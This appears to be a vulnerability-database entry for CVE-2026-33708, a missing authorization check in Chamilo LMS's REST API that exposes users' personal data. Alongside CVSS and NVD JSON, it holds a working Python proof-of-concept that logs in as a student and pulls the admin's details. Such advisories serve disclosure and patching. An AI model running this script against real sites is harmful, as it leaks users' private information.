Security Vulnerability Report
中文
CVE-2026-33708 CVSS 6.5 MEDIUM

CVE-2026-33708

Published: 2026-04-10 19:16:24
Last Modified: 2026-04-16 18:25:16
Source: [email protected]

Description

Chamilo LMS is a learning management system. Prior to 1.11.38, the get_user_info_from_username REST API endpoint returns personal information (email, first name, last name, user ID, active status) of any user to any authenticated user, including students. There is no authorization check. This vulnerability is fixed in 1.11.38.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:* - VULNERABLE
Chamilo LMS < 1.11.38

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_host = "http://example.com" api_endpoint = "/main/webservices/registration/rest.php" # Attacker's low-privilege credentials username = "student_user" password = "password" def exploit(): session = requests.Session() # Step 1: Authenticate to get a valid session cookie print("[*] Attempting to login as: {}".format(username)) login_data = { "username": username, "password": password } # Note: Login endpoint structure may vary based on Chamilo configuration login_resp = session.post(target_host + api_endpoint + "?action=login_user", data=login_data) if login_resp.status_code != 200: print("[-] Login failed") return print("[+] Login successful") # Step 2: Exploit the vulnerable endpoint to get 'admin' info target_victim = "admin" print("[*] Fetching info for user: {}".format(target_victim)) # The vulnerable action params = { "action": "get_user_info_from_username", "username": target_victim } vuln_resp = session.get(target_host + api_endpoint, params=params) if vuln_resp.status_code == 200: print("[+] Exploit successful! Response:") print(vuln_resp.json()) else: print("[-] Request failed with status code: {}".format(vuln_resp.status_code)) if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33708", "sourceIdentifier": "[email protected]", "published": "2026-04-10T19:16:24.107", "lastModified": "2026-04-16T18:25:15.883", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Chamilo LMS is a learning management system. Prior to 1.11.38, the get_user_info_from_username REST API endpoint returns personal information (email, first name, last name, user ID, active status) of any user to any authenticated user, including students. There is no authorization check. This vulnerability is fixed in 1.11.38."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.11.38", "matchCriteriaId": "A4D0C5D2-6FA0-4532-8E3D-4EA111A50621"}]}]}], "references": [{"url": "https://github.com/chamilo/chamilo-lms/commit/4a119f93abbfba6fe833580f2463c8d4afa500c2", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-qwch-82q9-q999", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.